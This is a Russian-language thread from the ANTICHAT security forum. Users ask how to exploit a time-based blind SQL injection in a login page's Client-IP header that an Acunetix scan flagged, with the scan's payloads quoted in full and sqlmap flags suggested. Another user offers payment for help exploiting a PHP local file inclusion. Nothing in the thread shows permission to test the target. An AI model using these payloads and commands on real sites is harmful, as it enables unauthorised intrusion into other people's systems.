ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

05.02.2020, 18:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 9189
Репутация:
0
|
|
Сканирую сканером сайт. Сегодня акунетикс выдал такой лог
Код:
Code:
The vulnerability affects http://www.site.com/login.php , Client-IP
Discovered by /Scripts/PerScheme/Blind_Sql_Injection.script
Attack details
HTTP Header input Client-IP was set to 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z
Tests performed:
0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.943
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.737
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.765
0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z => 9.925
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.727
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.741
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.756
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.85
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.718
HTTP request
GET /login.php HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP: 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z
Пишет Blind SQL. Как крутить такое?
|
|
|
|

05.02.2020, 18:34
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от Andrey979
Andrey979 said:
↑
Сканирую сканером сайт. Сегодня акунетикс выдал такой лог
Код:
Code:
The vulnerability affects http://www.site.com/login.php , Client-IP
Discovered by /Scripts/PerScheme/Blind_Sql_Injection.script
Attack details
HTTP Header input Client-IP was set to 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z
Tests performed:
0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.943
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.737
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.765
0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z => 9.925
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.727
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.741
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.756
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.85
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.718
HTTP request
GET /login.php HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP: 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z
Пишет Blind SQL. Как крутить такое?
Логично как пишет, Blind SQL! Попробуйте через SqlMap c параметрами --technique=B --level=5 --risk=3
|
|
|

05.02.2020, 19:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 9189
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
↑
Логично как
пишет, Blind SQL
! Попробуйте через SqlMap c параметрами --technique=B --level=5 --risk=3
Я не совсем понял как правильно скормить запрос мапу..
sqlmap -u http://www.site.com/login.php --technique=B --level=5 --dbs так?
|
|
|
|

05.02.2020, 19:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
|
|
|
|

06.02.2020, 01:12
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от ci0b2n1feec
ci0b2n1feec said:
↑
Есть уязвимый код
```
include(DB_DIR . '/lang/' . $global_arr['id'] . '.php');
```
Как видете LFI
PHP 5.3.8 %00 не помог, за помощь готов финансово отблагодарить!
Ты уже задавал данный вопрос. Вариантов не так много
./ .\ \\ // ? /[…]//
|
|
|
|

06.02.2020, 01:38
|
|
Guest
Сообщений: n/a
Провел на форуме: 6588
Репутация:
0
|
|
Сообщение от BabaDook
BabaDook said:
↑
Ты уже задавал данный вопрос. Вариантов не так много
./ .\ \\ // ? /[…]//
пробовал нечего не помогло
|
|
|
|

06.02.2020, 10:48
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от ci0b2n1feec
ci0b2n1feec said:
↑
Есть уязвимый код
```
include(DB_DIR . '/lang/' . $global_arr['id'] . '.php');
```
Как видете LFI
PHP 5.3.8 %00 не помог, за помощь готов финансово отблагодарить!
Изучить движок, исходники, возможно есть другие файлы, которые не доступны с вэба, но в них есть баги, проинклудить их...
|
|
|

06.02.2020, 12:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 6588
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
↑
Изучить движок, исходники, возможно есть другие файлы, которые не доступны с вэба, но в них есть баги, проинклудить их...
Это тоже пробовали, нечего интересного) Интересует что то типо NULL байт, как было в старых версиях
|
|
|
|

06.02.2020, 15:43
|
|
Guest
Сообщений: n/a
Провел на форуме: 9189
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
↑
Логично как
пишет, Blind SQL
! Попробуйте через SqlMap c параметрами --technique=B --level=5 --risk=3
Еще хотел спросить. А в GET запросе можно мапу задать уязвимый параметр, чтобы он по нему шел? В POST можно, а с GET возможно? Акунетикс выдаёт этот параметр - Client-IP
|
|
|
|

06.02.2020, 16:11
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от Andrey979
Andrey979 said:
↑
Еще хотел спросить. А в GET запросе можно мапу задать уязвимый параметр, чтобы он по нему шел? В POST можно, а с GET возможно? Акунетикс выдаёт этот параметр - Client-IP
Там где угодно можно задать, тут с подобными вопросами вам уже в ветку
Вопросы по SQLMap
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|